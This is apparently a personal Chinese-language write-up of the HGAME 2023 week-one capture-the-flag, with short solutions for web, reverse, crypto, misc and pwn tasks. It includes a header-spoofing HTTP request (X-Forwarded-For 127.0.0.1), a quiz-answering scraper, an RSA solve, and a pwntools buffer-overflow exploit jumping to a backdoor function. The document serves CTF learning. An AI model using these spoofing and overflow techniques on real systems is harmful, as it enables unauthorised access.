年末年初忙得想鼠,浅打两下……
Web - Classic Childhood Game
控制台直接执行函数即可
Web - Become A Member
GET / HTTP/1.1
Host: week-1.hgame.lwsec.cn:30637
User-Agent: Cute-Bunny
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: code=Vidar
Upgrade-Insecure-Requests: 1
Referer:bunnybunnybunny.com
X-Forwarded-For:127.0.0.1
Content-Length: 47
{"username":"luckytoday","password":"happy123"}
Web - Guess Who I Am
我写爬虫是一款菜狗(错乱)
import requests
al=[{"id":"ba1van4","intro":"21级 / 不会Re / 不会美工 / 活在梦里 / 喜欢做不会的事情 / ◼◻粉"},...]
import ast
headers={"Host": "week-1.hgame.lwsec.cn:30812",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
"Accept": "application/json, text/plain, */*",
"Connection": "keep-alive",
"Referer": "http://week-1.hgame.lwsec.cn:30812/"}
url="http://week-1.hgame.lwsec.cn:30812"
cookies={"session":"MTY3MzQ4OTAzN3xEdi1CQkFFQ180SUFBUkFCRUFBQU9fLUNBQUlHYzNSeWFXNW5EQTBBQzJOb1lXeHNaVzVuWlVsa0EybHVkQVFDQUVvR2MzUnlhVzVuREFnQUJuTnZiSFpsWkFOcGJuUUVBZ0FFfDz5IcB7f5lvpRwijKnYXmSq29oYpfT9mHQc_w-7c5ce"}
for i in range(100):
a=requests.get(url+"/api/getQuestion",headers=headers,cookies=cookies)
b=requests.get(url+"/api/getScore",headers=headers,cookies=cookies)
if "hgame" in b.text:
print(b.text)
break
tmp=ast.literal_eval(a.text)
for j in al:
if j["intro"]==tmp["message"]:
data={"id":j["id"]}
break
c=requests.post(url+"/api/verifyAnswer",headers=headers,cookies=cookies,data=data)
if "Please get a question first!" in c.text or "rong" in c.text:
break
cookies=c.cookies
RE - test your IDA
常规操作F5
RE - easyasm
异或即可
发现一年多过去自己已经把刚补学的汇编忘得七七八八,好崩溃,这就是老年人吗(……)
RE - easyenc
复制粘贴就完事了
v8='04,-1,-3,9,1,-13,-80,00,00,05,-16,-83,07,06,23,5,-21,23,-3,23,-22,01,-18,1,-22,-79,05,-6,08,01,23,-84,-20,01,-22,-3,-16,05,07,6'
v8=v8.split(',')
f=''
for i in range(len(v8)):
f+=chr((int(v8[i])+86)^0x32)
RE - encode
复制粘贴就完事了*2
v5='8,6,7,6,1,6,D,6,5,6,B,7,5,6,E,6,3,6,F,6,4,6,5,6,F,5,9,6,3,7,F,5,5,6,1,6,3,7,9,7,F,5,6,6,F,6,2,7,F,5,1,6,F,5,2,7,5,6,6,7,5,6,2,7,3,7,5,6,F,5,5,6,E,6,7,6,9,6,E,6,5,6,5,6,2,7,D,7'
v5=v5.split(',')
f=''
for i in range(0,176,2):
a=v5[i+1]+v5[i]
f+=chr(int(a,16))
Crypto-兔兔的车票
问就是懒人暴力破解甚至懒得整理代码
from PIL import Image
# from Crypto.Util.number import *
from random import shuffle, randint, getrandbits
# flagImg = Image.open('flag.png')
# width = flagImg.width
# height = flagImg.height
# def makeSourceImg():
# colors = long_to_bytes(getrandbits(width * height * 24))[::-1]
# img = Image.new('RGB', (width, height))
# x = 0
# for i in range(height):
# for j in range(width):
# img.putpixel((j, i), (colors[x], colors[x + 1], colors[x + 2]))
# x += 3
# return img
flagImg = Image.open('enc0.png')
width = flagImg.width
height = flagImg.height
def xorImg(keyImg, sourceImg):
img = Image.new('RGB', (width, height))
for i in range(height):
for j in range(width):
p1, p2 = keyImg.getpixel((j, i)), sourceImg.getpixel((j, i))
img.putpixel((j, i), tuple([(p1[k] ^ p2[k]) for k in range(3)]))
return img
"""
source文件夹下面的图片生成过程:
def makeImg():
colors = list(long_to_bytes(getrandbits(width * height * 23)).zfill(width * height * 24))
shuffle(colors)
colors = bytes(colors)
img = Image.new('RGB', (width, height))
x = 0
for i in range(height):
for j in range(width):
img.putpixel((j, i), (colors[x], colors[x + 1], colors[x + 2]))
x += 3
return img
for i in range(15):
im = makeImg()
im.save(f"./source/picture{i}.png")
"""
# n1 = makeSourceImg()
# n2 = makeSourceImg()
# n3 = makeSourceImg()
# nonce = [n1, n2, n3]
index = list(range(16))
shuffle(index)
e=0
"""
这里flag.png已经提前被保存在source文件夹下了,文件名也是picture{xx}.png
"""
# for i in index:
# im = Image.open(f"source/picture{i}.png")
# key = nonce[randint(0, 2)]
# encImg = xorImg(key, im)
# encImg.save(f'pics/enc{e}.png')
# e+=1
for i in index:
im = Image.open(f'pics/enc{e}.png')
for j in range(16):
key = Image.open(f'pics/enc{j}.png')
encImg = xorImg(key, im)
encImg.save(f"source/picture{i}_{j}.png")
e+=1
Crypto-RSA
问就是factordb然后常规操作
'''
from Crypto.Util.number import *
flag = open('flag.txt', 'rb').read()
p = getPrime(512)
q = getPrime(512)
n=p*q
e = 65537
m = bytes_to_long(flag)
c = pow(m, e, n)
print(f"c={c}")
print(f"n={n}")
"""
c=110674792674017748243232351185896019660434718342001686906527789876264976328686134101972125493938434992787002915562500475480693297360867681000092725583284616353543422388489208114545007138606543678040798651836027433383282177081034151589935024292017207209056829250152219183518400364871109559825679273502274955582
n=135127138348299757374196447062640858416920350098320099993115949719051354213545596643216739555453946196078110834726375475981791223069451364024181952818056802089567064926510294124594174478123216516600368334763849206942942824711531334239106807454086389211139153023662266125937481669520771879355089997671125020789
"""
'''
import gmpy2
import libnum
e=65537
c=110674792674017748243232351185896019660434718342001686906527789876264976328686134101972125493938434992787002915562500475480693297360867681000092725583284616353543422388489208114545007138606543678040798651836027433383282177081034151589935024292017207209056829250152219183518400364871109559825679273502274955582
n=135127138348299757374196447062640858416920350098320099993115949719051354213545596643216739555453946196078110834726375475981791223069451364024181952818056802089567064926510294124594174478123216516600368334763849206942942824711531334239106807454086389211139153023662266125937481669520771879355089997671125020789
p=11239134987804993586763559028187245057652550219515201768644770733869088185320740938450178816138394844329723311433549899499795775655921261664087997097294813
q=12022912661420941592569751731802639375088427463430162252113082619617837010913002515450223656942836378041122163833359097910935638423464006252814266959128953
phi=(p-1)*(q-1)
d=gmpy2.invert(e, phi)
m = pow(c,d,n)
print(libnum.n2s(int(m)))
Crypto-Be Stream
问就是懒到不想改写stream函数
# from flag import flag
# assert type(flag) == bytes
flag=b'\x1a\x15\x05\t\x17\t\xf5\xa2-\x06\xec\xed\x01-\xc7\xcc2\x1eXA\x1c\x157[\x06\x13/!-\x0b\xd4\x91-\x06\x8b\xd4-\x1e+*\x15-pm\x1f\x17\x1bY'
key = [int.from_bytes(b"Be water", 'big'), int.from_bytes(b"my friend", 'big')]
# def stream(i):
# if i==0:
# return key[0]%256
# elif i==1:
# return key[1]%256
# else:
# return (stream(i-2)*7%256 + stream(i-1)*4%256)%256
strea=[key[0]%256,key[1]%256]
# note: len(flag)==48, 48//2==24, 24**6<191102978
for i in range(2,191102978):
strea.append((strea[i-2]*7%256+strea[i-1]*4%256)%256)
enc = b""
for i in range(len(flag)):
# water = stream((i//2)**6) % 256
water=strea[(i//2)**6]
enc += bytes([water ^ flag[i]])
print(enc)
# print(enc)
# b'\x1a\x15\x05\t\x17\t\xf5\xa2-\x06\xec\xed\x01-\xc7\xcc2\x1eXA\x1c\x157[\x06\x13/!-\x0b\xd4\x91-\x06\x8b\xd4-\x1e+*\x15-pm\x1f\x17\x1bY'
Crypto-神秘的电话
前几道题偷的懒终究是反噬了.jpg
打开audacity对着手动录了半天,我的老胳膊老腰老眼睛……
----- ..--- ..--- ...-- . ..--.- .--. .-. .. .. -... .-.. -.-- ..--.- ..--.- .... --- -. .-- .- ..--.- .--- -- --. .... ..--.- ..-. --. -.- -.-. --.- .- --- --.- - -- ..-. .-.
另一部分base64解密得到提示“只有倒着翻过十八层的篱笆才能抵达北欧神话的终点”,将摩斯密码解密结果反转,栅栏密码密钥18,维吉尼亚密钥vidar,结束
MISC-Where am I
wireshark导出压缩包,显然伪加密,0017h位24改20,解压看图片详细信息GPS
MISC-e99p1ant_want_girlfriend
懒得翻脚本,既然crc校验不正确,高度随便改一下即可
PWN - easy_overflow - 复现
常规操作连上然后卡在错误提示,发觉自己根本不会,笑死
from pwn import *
p = remote("...","...")
elf = ELF("./vuln")
f_addr = elf.symbols["b4ckd0or"]
#p.sendline(b'a'*0x18+p64(0x401176))
p.sendline(b'a'*0x18+p64(f_addr))
p.interactive()
提示standard output: Bad file descriptor的处理方法:
网友评论